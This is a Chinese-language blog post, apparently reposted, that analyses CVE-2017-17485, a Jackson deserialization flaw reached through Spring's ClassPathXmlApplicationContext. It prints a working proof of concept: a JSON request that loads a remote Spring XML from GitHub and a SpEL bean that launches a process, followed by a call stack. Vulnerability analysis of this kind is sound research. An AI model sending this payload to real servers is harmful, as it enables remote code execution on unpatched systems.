[CVE-2017-17485] Jackson基于SpEL的反序列化

原創

2020-06-27 17:51

NVD描述：

FasterXML jackson-databind through 2.8.10 and 2.9.x through 2.9.3 allows unauthenticated remote code execution because of an incomplete fix for the CVE-2017-7525 deserialization flaw. This is exploitable by sending maliciously crafted JSON input to the readValue method of the ObjectMapper, bypassing a blacklist that is ineffective if the Spring libraries are available in the classpath.

对CVE-2017-7525修复不完善导致的黑名单绕过；gadget为org.springframework.context.support.ClassPathXmlApplicationContext，即需要Spring相关的类在其classpath中。

参考

https://www.cnblogs.com/afanti/p/10203282.html
https://github.com/shengqi158/Jackson-databind-RCE-PoC/tree/master/src/main/java/jackson
https://github.com/RealBearcat/Jackson-CVE-2017-17485

PoC：

POST /jackson/deserialize2 HTTP/1.1
Host: cqq.com:8080
Connection: close
Cookie: confluence-sidebar.width=285; confluence.browse.space.cookie=space-blogposts; JSESSIONID=F68E43CB2450951588F85C6054FF2814; XSRF-TOKEN=867c4ff2-4228-4e97-b9fa-81319af3502b; remember-me=YWRtaW46MTU4NjQ4OTM3NjIwMzo0ODFhYmVjZjBhODYxMmVlOTE0NmJhZTU5OGYwN2EwMQ
Content-Type: application/json
Content-Length: 171

{"id":1, "obj":["org.springframework.context.support.ClassPathXmlApplicationContext", "https://raw.githubusercontent.com/iBearcat/Jackson-CVE-2017-17485/master/spel.xml"]}

原因在于：
org.springframework.context.support.ClassPathXmlApplicationContext的构造器可以从一个url字符串中加载configLocations：
其接收输入的点在其接收String类型的构造器，

具体触发漏洞的逻辑在refresh方法中，继续跟进：

我理解这个原理是可控Spring的配置文件：
然后在配置文件中可以执行任意SpEL表达式？

<beans xmlns="http://www.springframework.org/schema/beans"
       xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
       xsi:schemaLocation="
     http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
    <bean id="pb" class="java.lang.ProcessBuilder">
        <constructor-arg value="calc.exe" />
        <property name="whatever" value="#{ pb.start() }"/>
    </bean>
</beans>

spring-context-4.3.6.RELEASE.jar!\org\springframework\context\expression\StandardBeanExpressionResolver#evaluate(String value, BeanExpressionContext evalContext)

最后这一步
spring-expression-4.3.6.RELEASE.jar!\org\springframework\expression\spel\standard\SpelExpression#getValue(EvaluationContext context)
就不用F7了吧，放一个GIF：

调用栈如下：

getValue:243, SpelExpression (org.springframework.expression.spel.standard)
evaluate:161, StandardBeanExpressionResolver (org.springframework.context.expression)
evaluateBeanDefinitionString:1448, AbstractBeanFactory (org.springframework.beans.factory.support)
doEvaluate:255, BeanDefinitionValueResolver (org.springframework.beans.factory.support)
evaluate:214, BeanDefinitionValueResolver (org.springframework.beans.factory.support)
resolveValueIfNecessary:186, BeanDefinitionValueResolver (org.springframework.beans.factory.support)
applyPropertyValues:1531, AbstractAutowireCapableBeanFactory (org.springframework.beans.factory.support)
populateBean:1276, AbstractAutowireCapableBeanFactory (org.springframework.beans.factory.support)
doCreateBean:553, AbstractAutowireCapableBeanFactory (org.springframework.beans.factory.support)
createBean:483, AbstractAutowireCapableBeanFactory (org.springframework.beans.factory.support)
getObject:306, AbstractBeanFactory$1 (org.springframework.beans.factory.support)
getSingleton:230, DefaultSingletonBeanRegistry (org.springframework.beans.factory.support)
doGetBean:302, AbstractBeanFactory (org.springframework.beans.factory.support)
getBean:197, AbstractBeanFactory (org.springframework.beans.factory.support)
preInstantiateSingletons:761, DefaultListableBeanFactory (org.springframework.beans.factory.support)
finishBeanFactoryInitialization:866, AbstractApplicationContext (org.springframework.context.support)
refresh:542, AbstractApplicationContext (org.springframework.context.support)
<init>:139, ClassPathXmlApplicationContext (org.springframework.context.support)
<init>:83, ClassPathXmlApplicationContext (org.springframework.context.support)
newInstance0:-1, NativeConstructorAccessorImpl (sun.reflect)
newInstance:62, NativeConstructorAccessorImpl (sun.reflect)
newInstance:45, DelegatingConstructorAccessorImpl (sun.reflect)
newInstance:408, Constructor (java.lang.reflect)
call1:129, AnnotatedConstructor (com.fasterxml.jackson.databind.introspect)
createFromString:326, StdValueInstantiator (com.fasterxml.jackson.databind.deser.std)
deserializeFromString:1351, BeanDeserializerBase (com.fasterxml.jackson.databind.deser)
_deserializeOther:170, BeanDeserializer (com.fasterxml.jackson.databind.deser)
deserialize:161, BeanDeserializer (com.fasterxml.jackson.databind.deser)
_deserialize:116, AsArrayTypeDeserializer (com.fasterxml.jackson.databind.jsontype.impl)
deserializeTypedFromAny:71, AsArrayTypeDeserializer (com.fasterxml.jackson.databind.jsontype.impl)
deserializeWithType:712, UntypedObjectDeserializer$Vanilla (com.fasterxml.jackson.databind.deser.std)
deserializeAndSet:138, FieldProperty (com.fasterxml.jackson.databind.deser.impl)
vanillaDeserialize:287, BeanDeserializer (com.fasterxml.jackson.databind.deser)
deserialize:151, BeanDeserializer (com.fasterxml.jackson.databind.deser)
_readMapAndClose:4001, ObjectMapper (com.fasterxml.jackson.databind)
readValue:2992, ObjectMapper (com.fasterxml.jackson.databind)
deserialize2:109, Jackson (org.joychou.controller)

發表評論

所有評論

還沒有人評論，想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.

[CVE-2017-17485] Jackson基于SpEL的反序列化

参考

如何基于surging跨网关跨语言进行缓存降级

2024合集

程序员天天 CURD，怎么才能成长，职业发展的思考(2)

移位操作搞定两数之商

教你用Perl实现Smgp协议

如何通过前端表格控件在10分钟内完成一张分组报表？

win11关闭自动检测病毒删文件

通用代码生成器简介

lightdb 单机模式下数据库平移

千兆宽带实际网速能到达多少？

fastjson反序列化攻防

[CVE-2017-17485] Jackson基於SpEL的反序列化

[CVE-2020-1957] Shiro小於1.5.2的認證繞過

JBoss漏洞

Jackson各個gadget的調用鏈

https://yachay.unat.edu.pe/blog/index.php?comment_area=format_blog&comment_component=blog&comment_co

linux以太網驅動總結